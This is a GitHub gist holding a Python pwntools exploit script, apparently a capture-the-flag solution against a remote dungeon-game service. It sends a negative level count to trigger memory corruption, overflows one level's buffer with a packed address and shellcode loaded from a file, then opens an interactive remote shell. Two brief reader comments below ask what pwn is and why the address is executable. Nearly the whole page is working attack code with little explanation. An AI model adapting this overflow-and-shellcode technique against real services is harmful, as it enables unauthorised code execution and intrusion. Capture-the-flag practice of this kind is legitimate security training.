Create a gist now

Instantly share code, notes, and snippets.

@m--- /wby.py Secret
Created Mar 17, 2015

What would you like to do?
# coding: utf-8
import os
import sys
import time
import re
import struct
import pwn
host = 'wildblue.termsec.net'
port = 2323
p = lambda x: struct.pack('<I', x)
s = pwn.remote(host, port)
payload = ('C' * 0x20) + p(0x20202024) + open('x86-linux-sh', 'rb').read()
print s.recvuntil('By what name shall we know thee? \n')
s.send('AAAA\n')
print s.recvuntil('What is your choice?\n')
s.send('1\n')
print s.recvuntil('How many levels should your dungeon have [1-3]:\n')
s.send('-1\n')
for i in range(0x0, 0xb2):
print s.recvuntil('Enter your data for level %d:\n' % i)
s.send('a' + '\n')
print s.recvuntil('Enter your data for level %d:\n' % 0xb2)
s.send(payload + '\n')
for i in range(0xb3, 0xff):
print s.recvuntil('Enter your data for level %d:\n' % i)
s.send('c' + '\n')
time.sleep(1)
print s.recvuntil('What is your choice?\n')
s.send('3\n')
print s.recvuntil('By what name shall we know thee? \n')
s.send(('D' * 48) + p(0x20202024) + '\n')
print s.recvuntil('What is your choice?\n')
s.send('4\n')
s.interactive()

What is the pwn lib?

Thanks!

excuse me ! why we should locate in 0x20202020? I don‘t konw why 0x20202020 is executable? thank you for your writeup。

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment